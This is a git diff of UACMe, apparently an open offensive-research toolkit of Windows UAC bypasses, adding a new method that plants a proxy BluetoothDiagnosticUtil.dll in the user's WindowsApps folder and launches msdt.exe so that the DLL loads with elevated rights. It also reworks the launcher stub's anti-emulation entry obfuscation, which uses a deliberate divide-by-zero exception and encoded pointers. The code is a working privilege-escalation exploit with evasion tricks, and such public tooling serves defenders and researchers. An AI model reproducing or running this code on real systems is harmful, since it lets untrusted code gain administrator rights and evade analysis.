diff --git a/LICENSE.md b/LICENSE.md
index 2d5e513..6fcf3e7 100644
--- a/LICENSE.md
+++ b/LICENSE.md
@@ -1,4 +1,4 @@
-Copyright (c) 2014 - 2021, UACMe authors
+Copyright (c) 2014 - 2022, UACMe authors
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
diff --git a/README.md b/README.md
index 946f722..61850e1 100644
--- a/README.md
+++ b/README.md
@@ -733,6 +733,16 @@ First parameter is number of method to use, second is optional command (executab
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.8
+72. Author: Emeric Nasi
+ * Type: Dll Hijack
+ * Method: Dll path search abuse
+ * Target(s): \syswow64\msdt.exe, \system32\sdiagnhost.exe
+ * Component(s): BluetoothDiagnosticUtil.dll
+ * Implementation: ucmMsdtMethod
+ * Works from: Windows 10 (10240)
+ * Fixed in: unfixed :see_no_evil:
+ * How: -
+ * Code status: added in v3.5.9
@@ -835,9 +845,10 @@ https://devblogs.microsoft.com/oldnewthing/20160816-00/?p=94105
* UACMe 3.5, WD and the ways of mitigation, https://swapcontext.blogspot.com/2020/10/uacme-35-wd-and-ways-of-mitigation.html
* UAC bypasses from COMAutoApprovalList, https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html
* Utilizing Programmatic Identifiers (ProgIDs) for UAC Bypasses, https://v3ded.github.io/redteam/utilizing-programmatic-identifiers-progids-for-uac-bypasses
+* MSDT DLL Hijack UAC bypass, https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass
# Authors
-(c) 2014 - 2021 UACMe Project
+(c) 2014 - 2022 UACMe Project
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Fhfiref0x%2FUACME&count_bg=%2379C83D&title_bg=%23555555&icon=&icon_color=%23E7E7E7&title=hits&edge_flat=false)](https://hits.seeyoufarm.com)
diff --git a/Source/Akagi/bin64res.h b/Source/Akagi/bin64res.h
index 6e7736b..32483e9 100644
Binary files a/Source/Akagi/bin64res.h and b/Source/Akagi/bin64res.h differ
diff --git a/Source/Akagi/bin64res.rc b/Source/Akagi/bin64res.rc
index 0590085..c2deb14 100644
--- a/Source/Akagi/bin64res.rc
+++ b/Source/Akagi/bin64res.rc
@@ -2,6 +2,7 @@
#include "winres.h"
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
IDR_FUBUKI64 RCDATA "bin\\fubuki64.cd"
+IDR_FUBUKI32 RCDATA "bin\\fubuki32.cd"
IDR_AKATSUKI64 RCDATA "bin\\akatsuki64.cd"
IDR_KAMIKAZE RCDATA "bin\\kamikaze.cd"
IDR_SECRETS RCDATA "bin\\secrets64.bin"
diff --git a/Source/Akagi/global.h b/Source/Akagi/global.h
index 2c57dac..281662f 100644
--- a/Source/Akagi/global.h
+++ b/Source/Akagi/global.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2014 - 2021
+* (C) COPYRIGHT AUTHORS, 2014 - 2022
*
* TITLE: GLOBAL.H
*
-* VERSION: 3.58
+* VERSION: 3.59
*
-* DATE: 01 Dec 2021
+* DATE: 04 Feb 2022
*
* Common header file for the program support routines.
*
@@ -45,11 +45,13 @@
#include "bin64res.h"
#define FUBUKI_ID IDR_FUBUKI64
#define AKATSUKI_ID IDR_AKATSUKI64
+#define FUBUKI32_ID IDR_FUBUKI32
#define KAMIKAZE_ID IDR_KAMIKAZE
#else
#include "bin32res.h"
#define FUBUKI_ID IDR_FUBUKI32
#define AKATSUKI_ID PAYLOAD_ID_NONE //this module unavailable for 32 bit
+#define FUBUKI32_ID IDR_FUBUKI32
#define KAMIKAZE_ID IDR_KAMIKAZE
#endif
@@ -149,5 +151,13 @@ typedef UINT(WINAPI *pfnEntryPoint)(
_In_ BOOL OutputToDebugger
);
+typedef struct _UACME_THREAD_CONTEXT {
+ TEB_ACTIVE_FRAME Frame;
+ pfnEntryPoint ucmMain;
+ DWORD ReturnedResult;
+ ULONG OptionalParameterLength;
+ LPWSTR OptionalParameter;
+} UACME_THREAD_CONTEXT, * PUACME_THREAD_CONTEXT;
+
extern PUACMECONTEXT g_ctx;
extern HINSTANCE g_hInstance;
diff --git a/Source/Akagi/main.c b/Source/Akagi/main.c
index 417d54a..0678c19 100644
--- a/Source/Akagi/main.c
+++ b/Source/Akagi/main.c
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2014 - 2021
+* (C) COPYRIGHT AUTHORS, 2014 - 2022
*
* TITLE: MAIN.C
*
-* VERSION: 3.57
+* VERSION: 3.59
*
-* DATE: 01 Nov 2021
+* DATE: 02 Feb 2022
*
* Program entry point.
*
@@ -217,10 +217,5 @@ NTSTATUS WINAPI ucmMain(
#pragma comment(linker, "/ENTRY:main")
VOID __cdecl main()
{
-#ifdef _WIN64
- __writegsqword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), (DWORD_PTR)ucmMain);
-#else
- __writefsdword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), (DWORD_PTR)ucmMain);
-#endif
- ExitProcess(StubInit());
+ ExitProcess(StubInit(ucmMain));
}
diff --git a/Source/Akagi/methods/hybrids.c b/Source/Akagi/methods/hybrids.c
index 3908f44..86d924d 100644
--- a/Source/Akagi/methods/hybrids.c
+++ b/Source/Akagi/methods/hybrids.c
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2015 - 2021
+* (C) COPYRIGHT AUTHORS, 2015 - 2022
*
* TITLE: HYBRIDS.C
*
-* VERSION: 3.58
+* VERSION: 3.59
*
-* DATE: 01 Dec 2021
+* DATE: 02 Feb 2022
*
* Hybrid UAC bypass methods.
*
@@ -1045,3 +1045,96 @@ NTSTATUS ucmJunctionMethod(
return MethodResult;
}
+
+/*
+* ucmMsdtMethod
+*
+* Purpose:
+*
+* Bypass UAC by dll hijack of sdiagnhost.
+* https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass
+*
+*/
+NTSTATUS ucmMsdtMethod(
+ _In_ PVOID ProxyDll,
+ _In_ DWORD ProxyDllSize
+)
+{
+ BOOLEAN bCleanupNeeded = FALSE;
+ UINT i;
+ NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
+#ifndef _WIN64
+ NTSTATUS ntStatus = STATUS_ACCESS_DENIED;
+#endif
+ WCHAR szPath[MAX_PATH * 2];
+ WCHAR szApp[MAX_PATH + 1];
+ WCHAR szParams[MAX_PATH * 2];
+
+#ifndef _WIN64
+ if (g_ctx->IsWow64) {
+ ntStatus = supEnableDisableWow64Redirection(TRUE);
+ if (!NT_SUCCESS(ntStatus))
+ return ntStatus;
+ }
+#endif
+
+ do {
+
+ RtlSecureZeroMemory(&szPath, sizeof(szPath));
+ if (!SHGetSpecialFolderPath(NULL, (LPWSTR)&szPath, CSIDL_LOCAL_APPDATA, FALSE))
+ break;
+
+ supConcatenatePaths(szPath, TEXT("Microsoft\\WindowsApps"), MAX_PATH);
+ supConcatenatePaths(szPath, BLUETOOTHDIAGNOSTICUTIL_DLL, MAX_PATH);
+
+ if (!supWriteBufferToFile(szPath, ProxyDll, ProxyDllSize))
+ break;
+
+ bCleanupNeeded = TRUE;
+
+ _strcpy(szApp, g_ctx->szSystemRoot);
+ supConcatenatePaths(szApp, SYSWOW64_DIR, MAX_PATH);
+ supConcatenatePaths(szApp, MSDT_EXE, MAX_PATH);
+
+ _strcpy(szParams, TEXT("-path "));
+ _strcat(szParams, g_ctx->szSystemRoot);
+ _strcat(szParams, TEXT("diagnostics\\index\\BluetoothDiagnostic.xml -skip yes"));
+
+ if (supRunProcess2(szApp,
+ szParams,
+ NULL,
+ SW_HIDE,
+ 10000))
+ {
+ MethodResult = STATUS_SUCCESS;
+ }
+
+ } while (FALSE);
+
+
+ if (bCleanupNeeded) {
+ i = 5;
+ do {
+
+ if (DeleteFile(szPath))
+ break;
+
+ Sleep(1000);
+ i--;
+ } while (i);
+
+ }
+
+
+#ifndef _WIN64
+ if (g_ctx->IsWow64) {
+ supEnableDisableWow64Redirection(FALSE);
+ }
+#endif
+
+#ifdef _DEBUG
+ supSetGlobalCompletionEvent();
+#endif
+
+ return MethodResult;
+}
diff --git a/Source/Akagi/methods/hybrids.h b/Source/Akagi/methods/hybrids.h
index 98358ba..a7c3fd3 100644
--- a/Source/Akagi/methods/hybrids.h
+++ b/Source/Akagi/methods/hybrids.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2015 - 2021
+* (C) COPYRIGHT AUTHORS, 2015 - 2022
*
* TITLE: HYBRIDS.H
*
-* VERSION: 3.57
+* VERSION: 3.59
*
-* DATE: 01 Nov 2020
+* DATE: 02 Feb 2022
*
* Prototypes and definitions for hybrid methods.
*
@@ -53,6 +53,10 @@ NTSTATUS ucmJunctionMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
+NTSTATUS ucmMsdtMethod(
+ _In_ PVOID ProxyDll,
+ _In_ DWORD ProxyDllSize);
+
//
// Post execution cleanup routines.
//
diff --git a/Source/Akagi/methods/methods.c b/Source/Akagi/methods/methods.c
index 7979268..bd32d50 100644
--- a/Source/Akagi/methods/methods.c
+++ b/Source/Akagi/methods/methods.c
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2015 - 2021
+* (C) COPYRIGHT AUTHORS, 2015 - 2022
*
* TITLE: METHODS.C
*
-* VERSION: 3.58
+* VERSION: 3.59
*
-* DATE: 01 Dec 2021
+* DATE: 04 Feb 2022
*
* UAC bypass dispatch.
*
@@ -45,6 +45,7 @@ UCM_API(MethodFwCplLua2);
UCM_API(MethodProtocolHijack);
UCM_API(MethodPca);
UCM_API(MethodCurVer);
+UCM_API(MethodMsdt);
ULONG UCM_WIN32_NOT_IMPLEMENTED[] = {
UacMethodWow64Logger,
@@ -131,7 +132,8 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodProtocolHijack, { NT_WIN10_REDSTONE5, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
{ MethodPca, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodCurVer, { NT_WIN10_THRESHOLD1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
- { MethodNICPoison, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }
+ { MethodNICPoison, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
+ { MethodMsdt, { NT_WIN10_THRESHOLD1, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE }
};
/*
@@ -746,3 +748,10 @@ UCM_API(MethodCurVer)
#endif
}
+
+UCM_API(MethodMsdt)
+{
+ return ucmMsdtMethod(
+ Parameter->PayloadCode,
+ Parameter->PayloadSize);
+}
diff --git a/Source/Akagi/methods/methods.h b/Source/Akagi/methods/methods.h
index 785d052..5dd16e5 100644
--- a/Source/Akagi/methods/methods.h
+++ b/Source/Akagi/methods/methods.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2014 - 2021
+* (C) COPYRIGHT AUTHORS, 2014 - 2022
*
* TITLE: METHODS.H
*
-* VERSION: 3.58
+* VERSION: 3.59
*
-* DATE: 21 Nov 2021
+* DATE: 04 Feb 2022
*
* Prototypes and definitions for UAC bypass methods table.
*
@@ -91,6 +91,7 @@ typedef enum _UCM_METHOD {
UacMethodPca, //+
UacMethodCurVer, //+
UacMethodNICPoison2, //+
+ UacMethodMsdt, //+
UacMethodMax,
UacMethodInvalid = 0xabcdef
} UCM_METHOD;
diff --git a/Source/Akagi/stub.c b/Source/Akagi/stub.c
index 5aa9fca..3d757a4 100644
--- a/Source/Akagi/stub.c
+++ b/Source/Akagi/stub.c
@@ -1,12 +1,12 @@
-/*******************************************************************************
+/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2018 - 2022
*
* TITLE: STUB.C
*
-* VERSION: 3.58
+* VERSION: 3.59
*
-* DATE: 28 Jan 2022
+* DATE: 02 Feb 2022
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -16,7 +16,7 @@
*******************************************************************************/
#include "global.h"
-UINT ucmExitCode = (UINT)STATUS_ACCESS_DENIED;
+TEB_ACTIVE_FRAME_CONTEXT g_fctx = { 0, "(^/\\^)" };
/*
* ucmSehHandler
@@ -31,66 +31,59 @@ INT ucmSehHandler(
_In_ EXCEPTION_POINTERS* ExceptionInfo
)
{
- DWORD_PTR entry;
- NTSTATUS result = wdIsEmulatorPresent();
+ UACME_THREAD_CONTEXT* uctx;
UNREFERENCED_PARAMETER(ExceptionInfo);
if (ExceptionCode == STATUS_INTEGER_DIVIDE_BY_ZERO) {
+ uctx = (UACME_THREAD_CONTEXT*)RtlGetFrame();
+ while ((uctx != NULL) && (uctx->Frame.Context != &g_fctx)) {
+ uctx = (UACME_THREAD_CONTEXT*)uctx->Frame.Previous;
+ }
+ if (uctx) {
+ if (uctx->ucmMain) {
+ uctx->ucmMain = (pfnEntryPoint)supDecodePointer(uctx->ucmMain);
-#ifdef _WIN64
- entry = (DWORD_PTR)__readgsqword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer));
- __writegsqword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), 0);
- entry = (RotateRight64(
- (ULONG_PTR)(ULONG_PTR)entry,
- 0x40 - (result & 0x3f)) ^ result);
-#else
- entry = (DWORD_PTR)__readfsdword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer));
- __writefsdword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), 0);
- entry = (RotateRight32(
- (ULONG_PTR)entry,
- 0x20 - (result & 0x1f)) ^ result);
-#endif
-
- ucmExitCode = ((pfnEntryPoint)(entry))(UacMethodInvalid,
- NULL,
- 0,
- FALSE);
-
+ uctx->ReturnedResult = uctx->ucmMain(UacMethodInvalid,
+ NULL,
+ 0,
+ FALSE);
+ }
+ }
return EXCEPTION_EXECUTE_HANDLER;
}
return EXCEPTION_CONTINUE_SEARCH;
}
-DWORD StubInit(VOID)
+DWORD StubInit(
+ _In_ PVOID EntryPoint)
{
int v = 1, d = 0;
- DWORD_PTR entry;
- NTSTATUS ntStatus = STATUS_NOT_SUPPORTED;
+ UACME_THREAD_CONTEXT uctx;
- __try {
+ RtlSecureZeroMemory(&uctx, sizeof(uctx));
-#ifdef _WIN64
- entry = (DWORD_PTR)__readgsqword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer));
- entry = (RotateRight64(
- (ULONG_PTR)entry ^ ntStatus,
- ntStatus & 0x3f));
- __writegsqword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), entry);
-#else
- entry = (DWORD_PTR)__readfsdword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer));
- entry = (RotateRight32(
- (ULONG_PTR)entry ^ ntStatus,
- ntStatus & 0x1f));
- __writefsdword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), entry);
-#endif
+ if (wdIsEmulatorPresent() == STATUS_NOT_SUPPORTED) {
- v = (int)USER_SHARED_DATA->NtProductType;
- d = (int)USER_SHARED_DATA->AlternativeArchitecture;
- v = (int)(v / d);
- }
- __except (ucmSehHandler(GetExceptionCode(), GetExceptionInformation())) {
- v = ucmExitCode;
+ uctx.Frame.Context = &g_fctx;
+
+ uctx.ucmMain = (pfnEntryPoint)supEncodePointer(EntryPoint);
+ RtlPushFrame((PTEB_ACTIVE_FRAME)&uctx);
+
+ __try {
+ v = (int)USER_SHARED_DATA->NtProductType;
+ d = (int)USER_SHARED_DATA->AlternativeArchitecture;
+ v = (int)(v / d);
+ }
+ __except (ucmSehHandler(GetExceptionCode(), GetExceptionInformation())) {
+ v = 1;
+ }
+
+ RtlPopFrame((PTEB_ACTIVE_FRAME)&uctx);
}
- return ucmExitCode;
+ if (v)
+ return uctx.ReturnedResult;
+ else
+ return (DWORD)STATUS_ACCESS_DENIED;
}
diff --git a/Source/Akagi/stub.h b/Source/Akagi/stub.h
index e0d0b81..5978aea 100644
--- a/Source/Akagi/stub.h
+++ b/Source/Akagi/stub.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2018 - 2021
+* (C) COPYRIGHT AUTHORS, 2018 - 2022
*
* TITLE: STUB.H
*
-* VERSION: 3.57
+* VERSION: 3.59
*
-* DATE: 01 Nov 2021
+* DATE: 02 Feb 2022
*
* Kuma stub header file
*
@@ -18,4 +18,4 @@
*******************************************************************************/
#pragma once
-DWORD StubInit(VOID);
+DWORD StubInit(_In_ PVOID EntryPoint);
diff --git a/Source/Akagi/uacme.vcxproj b/Source/Akagi/uacme.vcxproj
index f3ad5b2..70e1217 100644
--- a/Source/Akagi/uacme.vcxproj
+++ b/Source/Akagi/uacme.vcxproj
@@ -362,7 +362,6 @@
Windows
- false
true
true
@@ -372,6 +371,7 @@
6.1
+ false
diff --git a/Source/Akagi/uacme.vcxproj.user b/Source/Akagi/uacme.vcxproj.user
index 067c18d..4fdce08 100644
--- a/Source/Akagi/uacme.vcxproj.user
+++ b/Source/Akagi/uacme.vcxproj.user
@@ -16,7 +16,7 @@
WindowsLocalDebugger
- 71
+ 72
WindowsLocalDebugger
@@ -24,7 +24,8 @@
WindowsLocalDebugger
- 32
+
+
WindowsLocalDebugger
\ No newline at end of file
diff --git a/Source/Akatsuki/version.rc b/Source/Akatsuki/version.rc
index ee02fd4..e47a7a8 100644
Binary files a/Source/Akatsuki/version.rc and b/Source/Akatsuki/version.rc differ
diff --git a/Source/Fubuki/version.rc b/Source/Fubuki/version.rc
index 13e8ef3..16336e8 100644
Binary files a/Source/Fubuki/version.rc and b/Source/Fubuki/version.rc differ
diff --git a/Source/Naka/main.c b/Source/Naka/main.c
index 8f0105d..a6bc6bb 100644
--- a/Source/Naka/main.c
+++ b/Source/Naka/main.c
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2016 - 2020
+* (C) COPYRIGHT AUTHORS, 2016 - 2022
*
* TITLE: MAIN.C
*
-* VERSION: 3.50
+* VERSION: 3.59
*
-* DATE: 14 Sep 2020
+* DATE: 02 Feb 2022
*
* Naka, support payload compressor.
*
@@ -1121,6 +1121,11 @@ VOID CreateSecretTables(VOID)
if (ProcessUnit(szFileName, IDR_FUBUKI64, &S[c]))
c++;
+ szFileName[l] = 0;
+ _strcat(&szFileName[l], L"Fubuki32.key");
+ if (ProcessUnit(szFileName, IDR_FUBUKI32, &S[c]))
+ c++;
+
szFileName[l] = 0;
_strcat(&szFileName[l], L"Kamikaze.key");
if (ProcessUnit(szFileName, IDR_KAMIKAZE64, &S[c]))
diff --git a/Source/Shared/consts.h b/Source/Shared/consts.h
index d08856d..ba31eed 100644
--- a/Source/Shared/consts.h
+++ b/Source/Shared/consts.h
@@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
-* VERSION: 3.58
+* VERSION: 3.59
*
-* DATE: 28 Jan 2022
+* DATE: 04 Feb 2022
*
* Global consts definition file.
*
@@ -47,8 +47,8 @@
#define UCM_VERSION_MAJOR 3
#define UCM_VERSION_MINOR 5
-#define UCM_VERSION_REVISION 8
-#define UCM_VERSION_BUILD 2201
+#define UCM_VERSION_REVISION 9
+#define UCM_VERSION_BUILD 2202
#define SUPRUNPROCESS_TIMEOUT_DEFAULT 12000
@@ -147,6 +147,7 @@
//
#define APISET_KERNEL32LEGACY L"api-ms-win-core-kernel32-legacy-l1.DLL"
+#define BLUETOOTHDIAGNOSTICUTIL_DLL L"BluetoothDiagnosticUtil.dll"
#define COMCTL32_DLL L"comctl32.dll"
#define DISMCORE_DLL L"dismcore.dll"
#define DUSER_DLL L"duser.dll"
@@ -180,6 +181,7 @@
#define MMC_EXE L"mmc.exe"
#define MSCONFIG_EXE L"msconfig.exe"
#define MSCHEDEXE_EXE L"mschedexe.exe"
+#define MSDT_EXE L"msdt.exe"
#define OSK_EXE L"osk.exe"
#define PKGMGR_EXE L"pkgmgr.exe"
#define SDCLT_EXE L"sdclt.exe"
diff --git a/UACME.sha256 b/UACME.sha256
index afa9054..a83f894 100644
--- a/UACME.sha256
+++ b/UACME.sha256
@@ -7,26 +7,26 @@ b12885f92d7691b2823d2b921b7dda440cbcc4c6aa5a3b7c3e9e6f7af4772397 *Source\Akagi\a
02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02 *Source\Akagi\akagi.manifest
9434096968402430d1ace03ffbb13ba28c2e4fcb23e59ed353eac70aa02b5b25 *Source\Akagi\bin32res.h
3f399d7d08d61d4ab7d5188e893b0f2a06b5a5a00f0ce00db2d234463280540c *Source\Akagi\bin32res.rc
-8977786129c9d6d526fb2e41fb3a3ab25566ee53b60db658a41f75d6f58f4e90 *Source\Akagi\bin64res.h
-f7e3861fc30e750c9a65fc338a9ad72a8d7a31ee949aef37cfe98a15b60a9ba2 *Source\Akagi\bin64res.rc
+e732850b9f1b5432e5e75ac1ff4312f65e283ee9833b45b390633ea21a99b94a *Source\Akagi\bin64res.h
+5d1fc31a7caf39f1c766e15fb64d44f1417d3b6f2fe389f3e104218050c3746a *Source\Akagi\bin64res.rc
bc0e6067d038a528fdfc90793b199ae73f211da7df33341bfd7bcfce2c163eb7 *Source\Akagi\compress.c
5a46c82638d48aaea2edfed0e8c50981dd606be8e3c171f8608f51bc777305cf *Source\Akagi\compress.h
d3b0fdac91acd95076de2a1d037c05692712e92ef8f77fd1f8a1db1579ee2923 *Source\Akagi\encresource.h
f243a7dcea8584d55890ae0b2e01c1137b923ae6ea9bdd8ae97c14f9da79b788 *Source\Akagi\fusutil.c
eeddce39694b2f054aa86a7c37b2b56427209f775d27438a9427410550a2740b *Source\Akagi\fusutil.h
-d1acbe26c56a6c0b8db84dad2506dd50e84a8842b4f002b81ff9114d9531e8ba *Source\Akagi\global.h
-3a00394eb92d3bcbadad8a6313cd6d3ad5061901e80391450efcfe5e9bf8dc1e *Source\Akagi\main.c
+e0e97bec016ef156dad00c4986ed620584663a68823e9e8656239d595b915585 *Source\Akagi\global.h
+06c1b9b39448d4fd789856f51742c9346917080ca86a2f9b110c30c22d108c4b *Source\Akagi\main.c
9bd3b7a206ced26ce5e03a4002bbd41e4f57b8c8c9ce4467f54221ad68e55a58 *Source\Akagi\makecab.c
bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2 *Source\Akagi\makecab.h
c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
10a31b41ae931835100b1a7537be6fdaec2a306b71110fa9656f9bf5f4a6a76b *Source\Akagi\Resource.rc
-002992a366199b4bb180850bede26fd8602be8b36d37d93da6e3778460345fef *Source\Akagi\stub.c
-d951a09c7011fa1aa3854ea713836c9cd63aa88ac9f64f013d2f24f9fcaa9b38 *Source\Akagi\stub.h
+a808ad08347f68f18ddc75eed8e284e8479da7970af5b17a169fa972b8512d9a *Source\Akagi\stub.c
+b1b79e79880d60412e41d43b5e9ef936fdb3e66ad85e47fc0e1261ed07322d06 *Source\Akagi\stub.h
273c6105759779913664cd813232a69382562ff1818756cc689a45b1fd11a902 *Source\Akagi\sup.c
912447a3eb73b10278c965fd9273b4eb75902c41681e76e9a547b57af1e1617a *Source\Akagi\sup.h
-f245bd85599293b3c6bc294a01f160393e28703e98dc772ebd8b13d189897055 *Source\Akagi\uacme.vcxproj
+ee447f9ad4b2cccb615f8d530048a349243afdafbe9314637115cdd60b1684bd *Source\Akagi\uacme.vcxproj
15a18a8f06b4ce02de316a0b4a6b7a3cb41d6353711d3e2429164622c47e44ab *Source\Akagi\uacme.vcxproj.filters
-3779b8e127c260dd6f7bd4b84665465b3e09af811f8c90d6eef10a07d4395de3 *Source\Akagi\uacme.vcxproj.user
+f04df8b72d7d5fe30795e4cac6ec1268d1f955150303e366a91ac8f7ba6135be *Source\Akagi\uacme.vcxproj.user
fd2bf3f4369850efc4c408133ddf253ced6f0b400b13997060c50a2f9b6cc9d0 *Source\Akagi\uas.h
750326700ffeeac7f34aa111af345fec1c221f519347e57e35b96454fcc044f6 *Source\Akagi\appinfo\appinfo.acf
2a63a2c3f43afb1f3fb091ffa71bd4d67b64e6d0b220e97057542883bce246f5 *Source\Akagi\appinfo\appinfo.idl
@@ -51,10 +51,10 @@ e7654ba3099afcc9183d3d092e9cbe19ea06faddbbfb554891eeece174d81b8e *Source\Akagi\m
cf5152c786b5e72514038a256e0372c176ac20ca49653bbf80a0862963bf3c20 *Source\Akagi\methods\elvint.h
8453310f284faee89d5b5e575d1521dd6dd7983bc9cd67e204a51676d9511916 *Source\Akagi\methods\hakril.c
e72fce9d89c7ac424e90635dc984a943890c8422c2a6869c49c3a29accde6521 *Source\Akagi\methods\hakril.h
-49e14cdf2c470d50272980c46f15ef7b3ffad41e78de8d6f9cf9c3ee3db09b47 *Source\Akagi\methods\hybrids.c
-90aa9cbbbbe621a7215083fbfcd52bfc64df261a6dc795fb719a21a61db0fc9a *Source\Akagi\methods\hybrids.h
-1b793c9da6cf4755070ff6bec59bd1affc5e07d87b968ba211cb14b12916c9c4 *Source\Akagi\methods\methods.c
-ad157a213ace932adaf09559f91c600588c25a86801d7f1dda04f5973ed6b45d *Source\Akagi\methods\methods.h
+1edcbc82ed2f214b03f22305736179b6777a9bab755138b52ab5ae6e9dbf7b0a *Source\Akagi\methods\hybrids.c
+112da2d5701041e58b1b01a8d5a42854200b171ec8c8b4712f957f63877e16b6 *Source\Akagi\methods\hybrids.h
+a3d618693fc6780e5c1e8d04f3f8e8edb7d64ea77f635e20dbaff64118859585 *Source\Akagi\methods\methods.c
+9302023437c9a80e2d8910f6e9ffa24ece680278653ebef6247acfc1e21e64a6 *Source\Akagi\methods\methods.h
f220dbc1bb1e525e3adb76f0d1e9ac3237851bcbb55e7fd350288ef492116756 *Source\Akagi\methods\rinn.c
244cba3a74291e324964cfb40c153a00426b0e1f2fcb3f02ac7063e9915e52d8 *Source\Akagi\methods\rinn.h
c204e44cffb51d95128971ec8b31e668e3b4f50ba3f4082c36ced76c2b30bc63 *Source\Akagi\methods\shellsup.c
@@ -83,7 +83,7 @@ beb7d48597345d0109ce51c7452292ba6e970eb8ed5f716ec035087aa3f045b3 *Source\Akagi\p
a65a782ee8e6ace52ce6e51a64220618ca6057cd0de9c306301ef7db6ce4473d *Source\Akatsuki\dllmain.c
e10acf379efd906f8bf06a28e3b0b5598618c109c8a30f43e831b42f6aaf1950 *Source\Akatsuki\export.def
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Akatsuki\resource.h
-b506b75f27c926e96400505f1c4dba6309b81283eac4bd38d7ee54c0e4aa43c6 *Source\Akatsuki\version.rc
+4be964507603af178e31d7cbdb373e4bd6cc8c405be07e94f3f0d1217047515a *Source\Akatsuki\version.rc
ed9e60aeb6f2426647cafd1c1a495d19735a977537d4ab188736f2f4dac5b5d4 *Source\Fubuki\dll.vcxproj
119a274dc329b1d3bc94ee836fc7a18612faa26a517ad04fc3f95cc548f2b1a1 *Source\Fubuki\dll.vcxproj.filters
f0b8b0d1d5b85c4324c8cbb21d94dd8db69fd21bb5e37491bbd6aa2297fa0fc7 *Source\Fubuki\dll.vcxproj.user
@@ -95,18 +95,18 @@ bbc77818711a5f5152b99ca50cb018575ce05ff59859c45eb4bb7353d86daca8 *Source\Fubuki\
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Fubuki\resource.h
4aa24c1115cc3ed71027f760c7564357c162a09de58d75b5e9037cd869fb2a8a *Source\Fubuki\uihacks.c
73e735426c5fab97a7289a7a57bc8bb21bce7b2b1995ae076c41027780ed88c9 *Source\Fubuki\uihacks.h
-ebceab69aab14e266650ff14dde76f5c0e65e38779ed868b76c3960310a2a8f7 *Source\Fubuki\version.rc
+c8baef1a5f32ab37d3883d18fd9d9ddfa6a0729472960892eecf2e8d149ab167 *Source\Fubuki\version.rc
b419f6b7b8d24dc61e7473092a8326720ef54e1f65cc185da0c6e080c9debb94 *Source\Fubuki\winmm.h
f66280e29c2116d4b83f2c6899d8caf432f7a4d1ccc4e4cf4e72b05d0fbd1f25 *Source\Kamikaze\Kamikaze.msc
d090766c75d998b019d651fbb0c04112c6feb0f754628751682708e13baf2744 *Source\Kamikaze\Launcher.html
-f5e85b52a96d196e4131f145357153f74318f612657025f311832573f1404c9a *Source\Naka\main.c
+e54acaf84b54afaa2320803e0928ce9fbc19d8be3e8df4051b88f1b19cd836a5 *Source\Naka\main.c
4479c31a428b0672245b2eff026be202998a4f146ab90cd06ce44412a20bf462 *Source\Naka\naka.h
2e13d6847d5f730e7fcbb4a720614448cb364fc8df5dc0ed1694a63cc355b2e3 *Source\Naka\Naka.vcxproj
175c9fc0c7046d006a6db698144fab3b40bd191e15617e7fba417a466c3a0b6f *Source\Naka\Naka.vcxproj.filters
e67d285ac080ed3a22453a79f4390dfb1b5b131569aa53a2cd2502c4b5a69221 *Source\Naka\Naka.vcxproj.user
893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\cmdline.c
bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\cmdline.h
